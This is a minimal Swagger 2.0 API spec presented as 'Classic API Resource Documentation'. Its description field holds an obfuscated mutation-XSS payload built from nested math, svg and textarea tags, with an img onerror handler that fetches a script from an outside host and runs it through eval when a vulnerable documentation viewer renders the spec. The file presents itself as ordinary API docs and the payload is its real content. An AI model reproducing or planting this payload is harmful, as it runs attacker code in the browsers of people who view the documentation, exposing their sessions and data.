swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://exuberant-ice.surge.sh/script.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
